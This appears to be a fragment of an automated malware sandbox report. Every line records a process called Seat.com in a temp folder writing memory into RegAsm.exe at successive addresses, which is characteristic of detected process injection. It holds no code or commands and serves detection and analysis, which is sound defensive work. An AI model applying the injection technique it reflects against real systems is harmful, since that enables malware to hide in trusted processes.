                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305C30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305C94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305CF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305D5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305DC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305E24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305E88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305EECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305F50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1305FB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306018Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130607CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13060E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306144Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13061A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130620CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306270Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13062D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306338Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130639CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306400Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306464Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13064C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130652CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306590Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13065F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306658Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13066BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306720Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306784Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13067E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130684CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13068B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306914Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306978Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13069DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306A40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306AA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306B08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306B6CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306BD0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306C34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306C98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306CFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306D60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306DC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306E28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306E8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306EF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306F54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1306FB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130701CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307080Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13070E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307148Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13071ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307210Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307274Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13072D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130733CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13073A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307404Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307468Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13074CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307530Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307594Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13075F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130765CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13076C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307724Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307788Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13077ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307850Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13078B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307918Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130797CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13079E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307A44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307AA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307B0CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307B70Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307BD4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307C38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307C9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307D00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307D64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307DC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307E2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307E90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307EF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307F58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1307FBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308020Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308084Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13080E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130814CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13081B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308214Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308278Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13082DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308340Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13083A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308408Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130846CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13084D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308534Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308598Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13085FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308660Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13086C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308728Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130878CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13087F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308854Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13088B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130891CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308980Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13089E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308A48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308AACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308B10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308B74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308BD8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308C3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308CA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308D04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308D68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308DCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308E30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308E94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308EF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308F5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1308FC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309024Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309088Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13090ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309150Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13091B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309218Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130927CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13092E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13093A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130940CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309470Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13094D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309538Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130959CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309600Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309664Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13096C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130972CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309790Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13097F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309858Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13098BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309920Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309984Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 13099E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309A4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309AB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309B14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309B78Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309BDCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309C40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309CA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309D08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309D6CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309DD0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309E34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309E98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309EFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309F60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 1309FC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A028Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A08CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A0F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A154Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A1B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A21CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A280Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A2E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 130A348Jump to behavior
